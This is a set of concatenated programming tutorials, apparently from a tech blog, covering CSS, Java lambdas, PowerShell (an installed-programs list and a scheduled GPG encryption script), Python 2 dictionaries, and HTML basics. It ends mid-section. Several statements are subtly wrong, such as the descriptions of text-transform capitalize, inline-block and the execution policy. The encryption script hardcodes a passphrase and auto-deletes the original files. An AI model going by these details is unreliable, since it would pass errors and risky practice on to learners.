Once you've started dabbling in HTML, you'll probably be interested in adding more power to your web pages. CSS is the best way to do that. CSS lets you apply changes across your entire page without having to use lots of inline HTML styles. We'll go over how to create an inline stylesheet so you can practice your CSS skills, and then we'll move on to 10 simple examples that will show you how to do a few basic things. From there, your imagination is the limit! If you want a slightly more technical introduction, be sure to check out 5 Baby Steps to Learning CSS & Becoming a Kick-Ass CSS Sorcerer.

Inline Stylesheet

Every HTML document contains a <head> tag. That head section is where your inline CSS stylesheet goes, inside a <style> tag. Here's what it'll look like: <head> <style> All of your CSS declarations. </style> </head> Put that at the top of your document, fill it with your CSS, and you're set to go.

1. Easy Paragraph Formatting

The cool thing about styling with CSS is that you don't have to specify a style every time you create an element. You can just say "all paragraphs should have this particular styling" and you're good to go. Here's an example of how you might do that. Let's say you want every paragraph (that's everything with a <p> HTML tag) on your page to be slightly larger than usual. And dark grey, instead of black.
Here’s how you would do that with CSS: p { font-size: 120%; color: dimgray; } That’s all there is to it. Now, whenever the browser renders a <p> paragraph, the text will inherit the size (120 percent of normal) and the color (“dimgray”). If you’re curious as to which plain-text colors you can use, check out this CSS color list from Mozilla. 2. Change Letter Case Okay, so now that we’ve seen how to make a change to every paragraph, let’s look at how we can be a bit more selective. Let’s create a designation for paragraphs that should be in small caps. Here’s how we’d do that: p.smallcaps { font-variant: small-caps; } To make a paragraph that’s entirely in small caps, we’ll use a slightly different HTML tag. Here’s what it looks like: <p class="smallcaps">Your paragraph here.</p> As you can see, adding a dot and a class name to any specific element in CSS specifies a sub-type of that element defined by a class. You can do this with text, images, links, and just about anything else. If you want to change the case of a set of text to a specific case, you can use these CSS lines: text-transform: uppercase; text-transform: lowercase; text-transform: capitalize; The last one capitalizes the first letter of every sentence. 3. Change Link Colors Let’s try changing the style of something other than a full paragraph. There are four different colors a link can be assigned: its standard color, its visited color, its hover color, and its active color (which it displays while you’re clicking on it). Here’s how we might change those: a:link { color: gray; } a:visited { color: green; } a:hover { color: rebeccapurple; } a:active { color: teal; } Note that each “a” is followed by a colon, not a dot. Each one of those declarations changes the color of a link in a specific context. There’s no need to change the class of a link to get it to change color. It will all be determined by the user and the state of the link. 4. 
Remove Link Underlines While underlined text pretty clearly indicates a link, it sometimes looks nicer to scrap that underline. This is accomplished with the “text-decoration” attribute. Here’s how we’d get rid of underlines on links: a { text-decoration: none; } Anything with the link (“a”) tag will remain un-underlined. Want to underline it when the user hovers over it? Just add this below: a:hover { text-decoration: underline; } You could also add this text-decoration to active links to make sure the underline doesn’t disappear when the link is clicked. 5. Make a Link Button If you want to attract more attention to your link, using a link button is a great way to go about it. This one requires a few more lines, but we’ll go over them each individually: a:link, a:visited, a:hover, a:active { background-color: green; color: white; padding: 10px 25px; text-align: center; text-decoration: none; display: inline-block; } By including all four link states, we ensure that the button doesn’t disappear when a user hovers or clicks on it. You can also set different parameters for hover and active links, like changing the button or text color, to add a bit of pop. The background color is set with background-color, and text color with color. Padding defines the size of the box; the text is padded by 10px vertically and 25px horizontally. Text-align ensures that the text is displayed in the center of the button, instead of off to one side. Text-decoration, as we saw in the last example, removes the underline. “display: inline-block” is a bit more complicated. In short, it lets you set the height and width of the object, and ensures that it starts a new line when it’s inserted. 6. Create a Text Box A plain paragraph isn’t very exciting. If you want to highlight your call to action or another element on your page, you might want to throw a border around it.
Here’s how to do that with a string of text: p.important { border-style: solid; border-width: 5px; border-color: purple; } This one is pretty straightforward. It creates a solid purple border, 5 pixels wide, around any important-class paragraph. To make a paragraph inherit these properties, just declare it like this: <p class="important">Your important paragraph here.</p> This will work regardless of the size of your paragraph; a single line will get a border the width of the page, one line high, and a longer paragraph will be surrounded by a larger border. There are many different border styles you can apply; instead of “solid,” try “dotted” or “double.” And the width can be “thin,” “medium,” or “thick.” You can even define the thickness of each border individually, like this: border-width: 5px 8px 3px 9px; That results in a top border of 5 pixels, a right border of 8, a bottom of 3, and a left border size of 9 pixels. 7. Center-Align Elements For a very common task, this is a surprisingly unintuitive thing to do with CSS. Once you’ve done it a few times though, it becomes much easier. There are a couple different ways to center things. For a block element (usually an image), we’ll use the margin attribute: .center { display: block; margin: auto; } This ensures that the element is displayed as a block, and that the margin on each side is set automatically (which makes them equal). If you want to center all of the images on a given page, you can even add “margin: auto” to the img tag: img { margin: auto; } To learn why it works this way, check out the CSS box model explanation at W3C. But what if we want to center text?
CSS has a specific method of doing that: .centertext { text-align: center; } If we want to use the “centertext” class to center the text in a given paragraph, all we need to do is add that class to the <p> tag: <p class="centertext">This text will be centered.</p> Remembering those different steps, however, is another matter. You might want to bookmark this page. 8. Adjusting Padding The padding of an element specifies how much space should be on each side. For example, if you add 25 pixels of padding to the bottom of an image, the following text will be pushed 25 pixels down. Many elements can have padding, but we’ll use an image for an example here. Let’s say you want every image to have 20 pixels of padding on the left and right sides, and 40 pixels on the top and bottom. There are a number of ways you can do this. The most basic: img { padding-top: 40px; padding-right: 25px; padding-bottom: 40px; padding-left: 25px; } There’s a shorthand we can use to present all of this information: img { padding: 40px 25px 40px 25px; } This sets the top, right, bottom, and left paddings to the right number. But we can make it even shorter: img { padding: 40px 25px } When you use only two values, the first value is set for the top and bottom, while the second will be left and right. 9. Highlight Table Rows CSS can do a lot to make your tables look really nice. Adding colors, adjusting borders, and making your table responsive to mobile screens are all easy. We’ll look at just one cool effect here: highlighting table rows when you mouse over them. Here’s the code you’ll need for that: tr:hover { background-color: #ddd; } Now whenever you mouse over a table cell, that row will change color. To see some of the other cool things you can do, check out the W3C page on fancy CSS tables. 10. Shifting Images Between Transparent and Opaque CSS can help you do cool things with images, too.
For example, it can display images at less than full opacity (they appear slightly “whited out”) and bring them to full opacity when you mouse over them. Here’s how we’ll do that: img { opacity: 0.5; filter: alpha(opacity=50); } The “filter” attribute does the same thing as “opacity,” but Internet Explorer 8 and earlier don’t recognize the opacity measurement, so it’s a good idea to include it. Now that the images are slightly transparent, we’ll bring them to fully opaque on a mouseover: img:hover { opacity: 1.0; filter: alpha(opacity=100); } Become a CSS Master With these CSS code examples, you should have a much better idea of how CSS works. Once you’ve gone through all of them, you’ll notice a number of patterns that you can apply to further CSS code. And that’s when you know you’ve really started becoming a CSS master. And if all of this sounds too complicated, remember that you just grab some CSS templates and modify them. What do you do with CSS? Which examples would you like to see in the future? Share your thoughts in the comments below! A Quick Introduction To Java 8 Lambdas If you’re a Java programmer and you’re interested in learning more about Java 8 lambdas, in this article we’re going to take a closer look at lambda syntax and usage. A lambda expression in Java is a concise way to express a method of a class in an expression. It has a list of parameters and a body. The body can be a single expression or a block. It is commonly used where an implementation of an interface is required. This need usually arises when an interface is required as the argument to invoke a method. Some Simple Lambda Expressions Let us look at some simple examples of lambda expressions. The following is a lambda expression which accepts two numbers x and y and computes the sum. 
(int x, int y) -> x + y; Drop the parameter types for a more concise representation: (x, y) -> x + y; Define a function which accepts no parameters: () -> 404; The following is valid too, which accepts no parameters and returns nothing: () -> {} No need for parentheses enclosing parameters for a single parameter: x -> x + 1 More complex code blocks are also possible. The following lambda accepts a single line parameter and does some processing on it. Note that the type of the parameter is inferred from the surrounding context: line -> { String[] x = pattern.split(line); return new Player(Integer.parseInt(x[0]), x[1], x[2], x[3], Integer.parseInt(x[4])); } Clean and Concise Coding Using lambda expressions helps make your code clean and concise. To assist in this, Java 8 classes make extensive use of lambdas. Looping Over a List or a Set Collection classes such as List, Set, Queue, and such implement the Iterable interface, which makes looping over the elements much easier. Declare a list of names. List<String> names = Arrays.asList("Joe", "Jack", "James", "Albert"); Loop over the list without lambda: for (String name : names) { System.out.println(name); } Using lambda, the above loop can be written as: names.forEach(name -> System.out.println(name)); With Java 8 method references, the above can be written even more concisely as: names.forEach(System.out::println); Looping Over a Map A Map is a mapping of keys to values. Looping over a map involves looping over each of the (key, value) mappings. Compare how you can use lambdas for this situation.
First define a map: Map<String,Integer> map = new HashMap<>(); map.put("Atlanta, Georgia", 110); map.put("Austin, Texas", 115); map.put("Baltimore, Maryland", 105); map.put("Birmingham, Alabama", 99); map.put("Boston, Massachusetts", 98); You can loop over this map in the traditional way: for (Map.Entry<String,Integer> e : map.entrySet()) { System.out.println(e.getKey() + " => " + e.getValue()); } Here is how you can do the same thing in a quick and concise way using lambdas: map.forEach((k, v) -> System.out.println(k + " => " + v)); Functional Interfaces What is the type of a lambda expression? In other words, what is the type of X in the following statement? X x = a -> a + 1; The type of a lambda expression is a functional interface – an interface with a single abstract method. You can assign a lambda expression to an interface with a compatible abstract method. Some examples below. Creating a Multi-Threaded Task Consider creating a task for execution in a separate thread — you are required to define the task as an implementation of the Runnable interface and implement the run() method. Here Runnable is a functional interface. class MyTask implements Runnable { ... public void run() { // implement your task here System.out.println("Running in a separate thread now."); } ... } You can then create an instance of the MyTask class and use it to start a new thread of execution. MyTask task = new MyTask(); Thread thread = new Thread(task); thread.start(); Using a lambda, the process of creating a Runnable becomes much easier. The task definition above can be rewritten as: Runnable task = () -> System.out.println("Running in a separate thread now."); Or even: Thread thread = new Thread(() -> System.out.println("Running in a separate thread now.")); thread.start(); Comparison Using a Comparator The Comparator is a functional interface for comparing objects of a given type. It defines a single abstract method called compare() which can be defined using a lambda expression.
Here is a lambda expression creating a Comparator used to compare strings case-insensitively. Comparator<String> cmp = (x, y) -> x.compareToIgnoreCase(y); Once an instance of the Comparator functional interface has been created, it can be re-used as required. Here, we sort a list of strings in ascending order. List<String> names = Arrays.asList("Joe", "Jack", "James", "Albert"); Collections.sort(names, cmp); names.forEach(System.out::println); // prints Albert Jack James Joe The list above is sorted in place. We can now search it using the binarySearch() method as follows: System.out.println("search(Joe):" + Collections.binarySearch(names, "Joe", cmp)); // prints search(Joe):3 Computing maximum and minimum from a list is also easy using lambdas. Define some data: List<Integer> temps = Arrays.asList(110, 115, 105, 99, 98, 54, 109, 84, 81, 66, 72, 135, 115, 75, 82, 90, 88); Use a lambda expression to define the comparator: Comparator<Integer> cmpTemp = (x, y) -> Integer.compare(x, y); And print the maximum and minimum: System.out.println("------ Max/Min ------"); System.out.println(Collections.max(temps, cmpTemp) + "/" + Collections.min(temps, cmpTemp)); Use in GUI Programming Lambda expressions are also extremely useful in GUI programming to implement event handlers. Here is an example of using a button click handler. JButton button = new JButton("Click Me"); button.addActionListener(e -> System.out.println("Button clicked!")); And that was a quick look at using lambdas in Java 8. Have lambdas made your life easier since Java 8? Please explain in the comments below. How To Auto-generate A List Of Installed Programs On Windows You probably have several dozen pieces of software installed on your computer. Aside from tools you use every day like your web browser, it’s easy to forget about programs you don’t use often. This can cause problems whenever you’re resetting your computer or buying a new machine, as you won’t remember which software you need to reinstall.
Thankfully, Windows makes it easy to generate a list of all the software you have installed. It’s made possible by PowerShell, but don’t be scared if you’ve never used it before: you only need a few easy commands. Go ahead and open up a PowerShell window by typing Powershell into the Start Menu. Once there, paste in this line to generate a list of all your software, including its publisher and the date you installed it: Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize Of course, this list alone doesn’t do you much good. To send this information to a text file, append the line below, changing the file path to your username: > C:\Users\USERNAME\Desktop\InstalledProgramsList.txt Altogether, using the command below (make sure you change USERNAME to your own Windows username) will generate a list of your installed software and export it to a file on your desktop called InstalledProgramsList.txt: Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize > C:\Users\USERNAME\Desktop\InstalledProgramsList.txt To easily find out the different software you have installed on different systems, run this command on two machines and paste the resulting text into a text comparison website. Once you’re done, don’t forget to save this file to a flash drive, cloud storage, or other external media for safekeeping. If you wipe your computer, you’ll erase this file along with it! Interested in what PowerShell can do as opposed to the Command Prompt? Have a look at their differences. Do you find it useful to keep a list of installed software? Let us know if you’ll use this command soon down in the comments!
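Rather than pasting the two exports into a comparison website, the same diff can be done locally. Here is a minimal, hypothetical sketch in Python; it treats each export as a list of lines and uses inline sample data in place of the real InstalledProgramsList.txt files:

```python
def diff_program_lists(lines_a, lines_b):
    """Return (only_in_a, only_in_b) for two lists of program-list lines.

    Blank lines and surrounding whitespace are ignored, so the header
    rows Format-Table emits can simply be left in or stripped out.
    """
    a = {line.strip() for line in lines_a if line.strip()}
    b = {line.strip() for line in lines_b if line.strip()}
    return sorted(a - b), sorted(b - a)

# Sample data standing in for two exported files:
old_pc = ["7-Zip", "Firefox", "VLC"]
new_pc = ["7-Zip", "Firefox", "Paint.NET"]
only_old, only_new = diff_program_lists(old_pc, new_pc)
print("Missing on new PC:", only_old)  # Missing on new PC: ['VLC']
print("New on new PC:", only_new)      # New on new PC: ['Paint.NET']
```

In practice you would read the two lists with open("InstalledProgramsList.txt").readlines() on each machine's export.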
Image Credit: racorn via Shutterstock.com Automate File Encryption In Windows With This Powershell Script File encryption and file decryption can be a bit of work. However, using a PowerShell extension, you can slim down the process to a one-line command. To do this, we need to install Gpg4win and a Powershell module. Using scripts, we can automate the file encryption and decryption process. Let’s take a look at how to encrypt files in Windows 10 automatically with a script. The Prerequisites: Installs, Modules, and Certs You’ll want to have the GPG4Win tools installed and configured before you begin. Head over to the project page and download the latest version. (If you need some guidance installing and configuring the tool, use this PDF guide.) You are going to use the symmetric cipher function of GPG4Win in this module. This Powershell module handles file encryption using a passphrase rather than a keypair. The strength of your encryption depends on the strength of your passphrase. You should make sure to choose something complex. Generate it using LastPass or another password manager. Finally, complete the installation and move on to the Powershell Module. Powershell Modules are packaged collections of functions. They use the PSM1 file format. You save these files in your profile’s Modules directory. Then, add the Module to your session/script using Import-Module. All the module’s cmdlets are available. As you advance your Powershell skills, you can even create your own modules. To install the file Encryption module, download it from TechNet. Next, you need to copy it into one of the Modules directories. If you want to install it for just yourself, copy it into the WindowsPowerShell\Modules folder in your user profile. Copy this into Explorer for a shortcut: %UserProfile%\Documents\WindowsPowerShell\Modules If you want to install the module for all users, use the Program Files\Windows PowerShell\Modules folder.
Paste this into Explorer for a shortcut: %ProgramFiles%\Windows PowerShell\Modules Create a new folder named GNUPG in the Modules directory and paste the PSM1 file into it. You’ll need to import the module each time using: Import-Module GnuPG. However, you may need to adjust your Execution policy to Unrestricted. Do this by running the cmdlet Set-ExecutionPolicy RemoteSigned. Since you downloaded this Module, you still need to mark it as a local file. Right-click the file and select Properties. Next, in the dialog, click Unblock. Confirm your action in the UAC dialog, and you’re set to use the module. Working With the Cmdlets Skip the first Cmdlet, which is used to install GPG4Win. You should have already completed this step. If not, you can use this cmdlet to install and configure the program. The cmdlet downloads it to a folder you choose and runs the installer. The other two are complementary: Add-Encryption and Remove-Encryption. Both of these take three parameters. The first is a directory, passed as -FolderPath. The module will step through every file in a directory to apply or remove file encryption. You wouldn’t want to point it at your Documents folder. You would want to create a couple of subfolders for working with this script. If you look at the source code for the Module, it’s using Get-ChildItem to get everything in the directory. The decryption function limits the search to files ending in .GPG. The next parameter is the passphrase used for the file encryption: -Password. Make sure that this is complex, as it is the protection for your file. The function steps through each of the files with a ForEach loop. The file and passphrase combine as arguments in Start-Process for GPG4Win. The final parameter, -GPGPath, is not mandatory.
It is set to the default install location for GPG4Win. If you have it on another drive, you can update it using this parameter. It changes the target for the Start-Process. Writing the Script Now it’s time to automate the process. This script will encrypt the files in a directory, move the encrypted files to a new directory, and delete the original files. You start your script with some prep. First, import the module using Import-Module GnuPG. You need to set up a couple of variables. The first variable, $EncryptionTarget, is your target folder. (In the example, an environment variable is used to point to the current user’s document folder.) Set the second variable as your passphrase. This step makes it easier to change it later.

Import-Module GnuPG
$EncryptionTarget = "$($env:USERPROFILE)\Documents\Files-ToEncrypt"
$Passphrase = "MakeAVeryLongSecurePhrase"

Add-Encryption $EncryptionTarget -Password $Passphrase
Start-Sleep -Seconds 60

$EncryptedFiles = Get-ChildItem $EncryptionTarget | Where-Object { $_.Name -like "*.gpg" }
foreach ($gpg in $EncryptedFiles) {
    Move-Item -Path $gpg.FullName -Destination "$($env:USERPROFILE)\Documents\$($gpg.Name)"
}

$UnEncryptedFiles = Get-ChildItem $EncryptionTarget | Where-Object { $_.Name -notlike "*.gpg" }
foreach ($nongpg in $UnEncryptedFiles) {
    Remove-Item -Path $nongpg.FullName -Confirm:$false
}

Those variables go to Add-Encryption as parameters. You use a Start-Sleep to give the file encryption time to complete. The example uses 60 seconds. You can alter it based on the size and number of files you are working with. You get the .GPG files by combining Get-ChildItem with Where-Object. Using a ForEach loop, each one of those files is copied to a new directory. We repeat these steps, but switching the -like for -notlike. A second ForEach loop cleans up the original files. Setting the Recurring Task You have the script, now you need to create a scheduled task. Open Task Scheduler and click Create Task.
Name it something like AutoEncrypt. If you only want the task to run when you are logged in, just leave the default. If you set it to run regardless, it can only access local directories. However, if your destination is on a remote machine, you need to store your password for the job to run. You may want to set up a secondary account to protect the security of your main account.

Click on the Triggers tab and set up the conditions. Next, click New to pull up the scheduling window. You can leave the trigger settings at the default. Click the checkbox next to Repeat Task Every and set it to 5 Minutes. You can choose to run this less often if your need isn't urgent. In the dropdown next to for the duration of:, select Indefinitely. Click OK to go back to the Create Task window.

On the Actions tab, click New. In the popup, put the path to PowerShell in the Program box:

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

In the arguments box, put -File followed by the path to your script. Click OK twice and your script is set to run as a scheduled task.

Some Security Concerns and Other Ideas

Be aware that you have the passcode to decrypt the files on the same machine where you are storing them. These types of file encryption are more for encrypting a file before you send it, or storing it on another machine. (If you want a locked-down file system, use full disk encryption.) You can set up a similar task to do the same with decryption.

Do you have a project that needs a quick and dirty file encryption script? Let us know in the comments.

Python Dictionary: How You Can Use It To Write Better Code

A Python dictionary is a data structure similar to an associative array found in other programming languages. An array or a list indexes elements by position. A dictionary, on the other hand, indexes elements by keys, which can be strings.
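The contrast between positional and keyed indexing can be sketched quickly (Python 3 syntax; the sample data here is made up for illustration):

```python
# A list indexes elements by position...
colors = ['red', 'green', 'blue']
print(colors[1])            # green

# ...while a dictionary indexes them by key, which can be a string.
hex_codes = {'red': '#ff0000', 'green': '#00ff00', 'blue': '#0000ff'}
print(hex_codes['green'])   # #00ff00
```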
Think of a dictionary as an unordered set of key-value pairs.

In this article, we introduce you to working with the Python dictionary.

Creating a Dictionary

There are several ways of creating a Python dictionary. The simplest uses brace initialization, with a syntax reminiscent of JSON.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}

You can use numbers as keys too. However, be careful using floating-point numbers as keys, since the computer stores these as approximations.

rain_percent = { 1980: '17%', 1981: '15%', 1982: '10%'}
print rain_percent
print rain_percent[1980]

# prints
{1980: '17%', 1981: '15%', 1982: '10%'}
17%

Specifying Key-Value Pairs

You can also create and initialize a dictionary using name-value pairs as keyword arguments to the dict() constructor.

population = dict(California=37253956, Colorado=5029196, Connecticut=3574097, Delaware=897934)
print population

# prints
{'Connecticut': 3574097, 'Delaware': 897934, 'California': 37253956, 'Colorado': 5029196}

Array of Key-Value Tuples

Yet another way of creating a dictionary is to use an array of key-value tuples. Here is the same example as above.

pairs = [('California', 37253956), ('Colorado', 5029196), ('Connecticut', 3574097), ('Delaware', 897934)]
population = dict(pairs)
print population

# prints
{'Connecticut': 3574097, 'Delaware': 897934, 'California': 37253956, 'Colorado': 5029196}

Dict Comprehension

Dict comprehension provides a cool syntax to initialize a dict if you can compute the values based on the keys. The following initializes a dict of numbers and their square values for a range of numbers.

print {x: x**2 for x in xrange(10, 20)}

# prints
{10: 100, 11: 121, 12: 144, 13: 169, 14: 196, 15: 225, 16: 256, 17: 289, 18: 324, 19: 361}

How does it work? The latter part (for x in xrange(10, 20)) returns a range of numbers in the specified range. The dict comprehension part ({x: x**2 ..}) loops over this range and initializes the dictionary.
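The caveat above about floating-point keys is easy to demonstrate. A short sketch (Python 3 syntax; the sample dictionary is hypothetical):

```python
# 0.1 + 0.2 is stored as an approximation, not exactly 0.3,
# so it does not match an entry stored under the key 0.3.
rain_percent = {0.3: '10%'}

key = 0.1 + 0.2
print(key)                    # 0.30000000000000004
print(key == 0.3)             # False
print(rain_percent.get(key))  # None -- the lookup misses
print(rain_percent.get(0.3))  # 10%
```

This is why integers or strings make safer dictionary keys than computed floats.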
Working With a Python Dictionary

What can you do with dictionaries once you have created them? Well, you can access elements, update values, delete elements, and so on.

Accessing Python Dictionary Elements

Access an element of a dict using the key within brackets, just like you would an array or a list.

print population['Delaware']

# prints
897934

If the key is a number, you don't need the quotes. The expression then looks like list or array indexing.

print rain_percent[1980]

# prints
17%

The type of the key when accessing it must match what is stored in the Python dictionary. The following causes an error, since the stored keys are numbers while the access key is a string.

x = '1980'
print rain_percent[x]

# raises
KeyError: '1980'

Accessing a non-existent key is also an error.

rain_percent = { 1980: '17%', 1981: '15%', 1982: '10%'}
print rain_percent[1983]

# raises
KeyError: 1983

To access a key and provide a default value if the mapping does not exist, use the get() method with the default value as the second argument.

print rain_percent.get(1985, '0%')

# prints
0%

Checking for Existence

What if you want to check for the presence of a key without actually attempting to access it (and possibly encountering a KeyError as above)? You can use the in keyword in the form key in dct, which returns a boolean.

print 1980 in rain_percent
print '1980' in rain_percent

# prints
True
False

Reverse the condition (i.e. ensure that the key is not present in the Python dictionary) using the form key not in dct. This is equivalent to the standard Python negation not key in dct.

print 1980 not in rain_percent
print 1985 not in rain_percent

# prints
False
True

Modifying Elements

Change a value by assigning to the required key.
users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
users['age'] = 29
print users

# prints
{'lastname': 'Smith', 'age': 29, 'firstname': 'John'}

Use the same syntax to add a new mapping to the Python dictionary.

users['dob'] = '15-sep-1971'
print users

# prints
{'dob': '15-sep-1971', 'lastname': 'Smith', 'age': 29, 'firstname': 'John'}

Update multiple elements of a dictionary in one shot using the update() method.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
users.update({'age': 29, 'dob': '15-sep-1971'})
print users

# prints
{'dob': '15-sep-1971', 'lastname': 'Smith', 'age': 29, 'firstname': 'John'}

Set a default value for a key using setdefault(). This method sets the value for the key only if the mapping does not exist, and returns the resulting current value.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}

# does not change current value
print users.setdefault('firstname', 'Jane')
# prints John

# sets value
print users.setdefault('city', 'NY')
# prints NY

# Final value
print users
# prints {'lastname': 'Smith', 'age': 27, 'firstname': 'John', 'city': 'NY'}

Deleting Elements

Delete mappings in the dictionary using the del operator. This operator does not return anything. You will encounter a KeyError if the key does not exist in the dictionary.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
del users['age']
print users

# prints
{'lastname': 'Smith', 'firstname': 'John'}

Use the pop() method instead when you want the deleted value back.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
print users.pop('age')
print users

# prints
27
{'lastname': 'Smith', 'firstname': 'John'}

What if you want to delete a key if it exists, without causing an error if it doesn't?
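The del/pop contrast behind this question comes down to the following (a sketch in Python 3 syntax):

```python
users = {'firstname': 'John', 'lastname': 'Smith'}

# del raises on a missing key...
try:
    del users['age']
except KeyError as exc:
    print('KeyError:', exc)

# ...while pop() with a default quietly returns the default instead.
print(users.pop('age', None))   # None
```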
You can use pop() and specify None for the second argument, as follows:

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
users.pop('foo', None)
print users

# prints
{'lastname': 'Smith', 'age': 27, 'firstname': 'John'}

And here is a one-liner to delete a bunch of keys from a dictionary without causing an error on non-existent keys.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27, 'dob': '15-sep-1971'}
map(lambda x : users.pop(x, None), ['age', 'foo', 'dob'])
print users

Want to delete all keys from a dictionary? Use the clear() method.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
users.clear()
print users

# prints
{}

Looping With Python Dictionaries

Python provides many methods for looping over the entries of a dictionary. Pick one to suit your need.

Looping Over Keys

• The simplest method for processing keys (and possibly values) in sequence uses a loop of the form:

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
for k in users:
    print k, '=>', users[k]

# prints
lastname => Smith
age => 27
firstname => John

• Using the method iterkeys() works exactly the same as above. Take your pick as to which form you want to use.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
for k in users.iterkeys():
    print k, '=>', users[k]

# prints
lastname => Smith
age => 27
firstname => John

• A third method to retrieve and process keys in a loop involves using the built-in function iter().

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
for k in iter(users):
    print k, '=>', users[k]

# prints
lastname => Smith
age => 27
firstname => John

• When you need the index of the key being processed, use the enumerate() built-in function as shown.
users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
for index, key in enumerate(users):
    print index, key, '=>', users[key]

# prints
0 lastname => Smith
1 age => 27
2 firstname => John

Looping Over Key-Value Pairs

• When you want to retrieve each key-value pair with a single call, use iteritems().

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
for k, v in users.iteritems():
    print k, '=>', v

# prints
lastname => Smith
age => 27
firstname => John

Iterating Over Values

• The method itervalues() can be used to iterate over all the values in the dictionary. Though this method looks similar to a loop using values(), it is more efficient, since it does not extract all the values at once.

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
for value in users.itervalues():
    print value

# prints
Smith
27
John

Extracting Arrays

The following methods describe extracting various Python dictionary information in array form. The resulting array can be looped over using normal Python constructs. However, keep in mind that the returned array can be large depending on the size of the dictionary, so it can be more expensive (memory-wise) to process these arrays than to use the iterator methods above.

One case where it is acceptable to work with these arrays is when you need to delete items from the dictionary as you encounter undesirable elements. Working with an iterator while modifying the dictionary may cause a RuntimeError.

• The method items() returns an array of key-value tuples. You can iterate over these key-value pairs as shown:

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
for k, v in users.items():
    print k, '=>', v

# prints
lastname => Smith
age => 27
firstname => John

• Retrieve all the keys in the dictionary using the method keys().

users = {'firstname': 'John', 'lastname': 'Smith', 'age': 27}
print users.keys()

# prints
['lastname', 'age', 'firstname']

Use the returned array to loop over the keys.
for k in users.keys():
    print k, '=>', users[k]

# prints
lastname => Smith
age => 27
firstname => John

• In a similar way, use the method values() to retrieve all the values in the dictionary.

for value in users.values():
    print value

# prints
Smith
27
John

How Do You Use Python Dictionaries?

We have tried to cover the most common use cases for Python dictionaries in this article. Make sure to check out all of our other Python articles for even more Python tips. If you have other use cases you feel should be included, please let us know in the comments below!

Image Credits: viper345/Shutterstock

The Essential HTML FAQ You Should Bookmark

HTML has been around for a long time now, so it's about time you learned the basics: what it is, how it works, and how to write some common elements in HTML. Before starting, make sure you read our guide to free online HTML editors and the best websites for quality HTML coding examples.

What Is HTML?

HTML is the language used to construct web pages. HTML stands for Hypertext Markup Language and is simply a set of instructions for your web browser. Using these instructions, your browser displays what a web page should look like. It's important to understand that it's a markup language, not a programming language. Programming languages allow you to solve problems, such as math equations, manipulating data, or moving a video game character. You're unable to write any logic in HTML. It is only concerned with layout.
What Does HTML Look Like?

HTML consists of several elements known as "tags". Tags are instructions for styling a specific part of your web page. Going back to construction, HTML is the plans, and tags are specific features such as windows or doors. Here's what a very basic web page looks like in HTML:

<html>
  <head>
    <title>MUO Website</title>
  </head>
  <body>
  </body>
</html>

Tags in HTML are pre-defined, and specify common features like images, links to other web pages, buttons, and more. The vast majority of tags have to be opened and closed. This simply defines some feature, with text, images, or other tags inside it, and then ends the definition. Thinking back to houses, opening the tag is like saying "start the window here", and closing the tag is like saying "here's where the window ends".

HTML tags won't actually show up on your website. Your browser follows the instructions but never shows them to any visitors. They're not secret, however. Anyone can look at your HTML once you publish your web pages. While there is a large number of different HTML tags, you don't have to learn them all before you can code a website. Today you'll learn how to write some common tags, and what they can be used for.

What Are HTML Tag Attributes?

One last thing to know about tags is attributes. Attributes define special features of tags. If tags are windows and doors, then attributes specify specific building details. This could be the width and height of the frame, whether the window opens, or if the door has a lock. Attributes are included inside the opening tag, like this:

<p width="123" height="567"></p>

You can't just make up your own tags or attributes. Attributes and tags are pre-defined by the World Wide Web Consortium (W3C).

What Is HTML5?

HTML5 is the latest version of HTML. It contains several new tags, attributes, and features. As HTML is a set of instructions, different web browsers sometimes interpret it differently.
One browser might decide that windows and doors should be painted black unless you say otherwise. While browsers have finally started to become quite consistent with each other, you can still get caught out sometimes with very new features. Perhaps Google Chrome has implemented a new tag, but Microsoft's Internet Explorer has not yet. For the most part, your web pages will look the same across all the major browsers, but it's still worth having a quick test before you publish anything, especially if you're using newer tags, which may not be supported by all browsers yet. If you'd like to know more about HTML5, then take a look at our HTML5 getting-started guide.

How to Comment Out HTML

Like many other languages, markup or programming, HTML has the ability to "comment out" blocks of markup. A comment is something that is ignored by the browser. It may be a note to remind yourself what a particular piece of your website does. By commenting out markup, you are instructing the browser to ignore one or more tags. This can be useful to remove functionality, or to hide a piece of your website without deleting the code. When a web browser sees a comment, it understands it as "don't use these instructions until I say otherwise". Comments consist of an "opening" comment and a "closing" comment, just like tags. Here's an example:

<!-- Don't forget to add the XYZ here! -->
<p width="123" height="567"></p>

Commenting out code is done exactly the same way:

<!--
<p width="123" height="567"></p>
-->

Rather than a message, put your markup between the comment tags.
How to Insert Images in HTML

Inserting images into your HTML is done with the image tag:

<img src="MUO_logo.jpg" alt="MakeUseOf Logo">

Notice how the tag name is img, and there are two attributes. The src attribute specifies where to find the image, and the alt attribute is an alternative text description, in case the image cannot be loaded for any reason. The image tag does not need closing, unlike most other tags.

How to Change Font in HTML

Fonts can be changed using the font tag and the face attribute:

<font face="arial">MUO Arial Text</font>

Font size can easily be changed using the size attribute:

<font size="12">MUO Big Text</font>

If you'd like to change the font color, this can easily be done with the color attribute:

<font color="red">MUO Red Text</font>

These attributes are unique to the font tag. If you wish to use another tag, you can nest tags by placing one inside the other:

<p><font color="red">MUO Red Text</font></p>

How to Add a Link in HTML

Links can be added using the a tag:

